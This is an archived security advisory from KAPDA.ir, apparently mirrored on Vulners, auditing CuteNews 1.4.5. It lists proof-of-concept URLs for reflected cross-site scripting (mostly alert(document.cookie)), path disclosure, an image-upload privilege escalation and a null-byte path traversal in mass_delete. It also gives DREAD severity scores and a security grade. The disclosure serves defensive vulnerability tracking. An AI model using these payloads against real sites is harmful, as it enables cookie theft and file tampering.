Vulners
Lucene search
kapda-450.txt
`
Product: cutenews 1.4.5
Vendor: http://cutephp.com
The Results through security analysis of cutenews
1.4.5
[provided by KAPDA.ir]
--------------------------------------------------
Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES
Statistical Results from 'security Audit' perspective
TOTAL UNIQUE BUGS (12)
Number of integration errors: 3
Type: Path Disclosure , Authorization error
(privileges escalation), XSS
PoC:index.php?debug
DREAD Severity: 7 (Low)
PoC:index.php?mod=images&subaction=upload
DREAD Severity: 12 (Medium)
PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
Number of Technical errors: 9
Type: XSS ,Html Injection, Path disclosure, Path
traversal
PoC:show_news.php?KAPDA="><script>alert()</script>
DREAD Severity: 7 (Low)
PoC:index.php?mod=<script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
DREAD Severity: 8 (Medium)
PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script>
DREAD Severity: 8 (Medium)
PoC:Story
field:</textarea><script>alert(document.cookie)</script>
DREAD Severity: 12 (Medium)
PoC:index.php?mod=massactions&action=mass_delete&selected_news=)
DREAD Severity: 7 (Low)
PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=../upimages/ddddd.php%00
DREAD Severity: 10 (Medium)
Number of Logical errors: 0
Statistical Results from 'functional Risk Base'
perspective
Authentication mechanism: passed
Use a policy of least-privileged accounts: passed
Session Management: passed
Cookie Management: passed
Sensitive Data Management: passed
Cryptography:passed
Error handling: Passed But with negligence
Authorization: Passed But with negligence
Configuration Management:Passed But with negligence
PHP Coding Performance: Passed But with negligence
Security by design: Passed But with negligence
Note: using Extract() improperly, leads to several
cross site scripting bugs.
Input/Data validation: Not passed
Auditing and Logging: Not Passed
Statistical Results from 'Security Metrics'
perspective
Number of discovered bugs: 15
Number of reviewed Code Lines: 6000
Bugs per 10KLOC: 25
Vulnerabilities severity average: Low
Number of discovered bugs after stable release: 15
Number of 'Documents' pages relevant to security: 1
Quality of Security support: Moderate
Security Grade at the current version (1.4.5) From
Kapda : B-
Note: All Grades are: A , B+ , B , B- , C+ , C , C- ,
D
Reference: http://www.kapda.ir/advisory-450.html
____________________________________________________________________________________
Sponsored Link
Online degrees - find the right program to advance your career.
Www.nextag.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4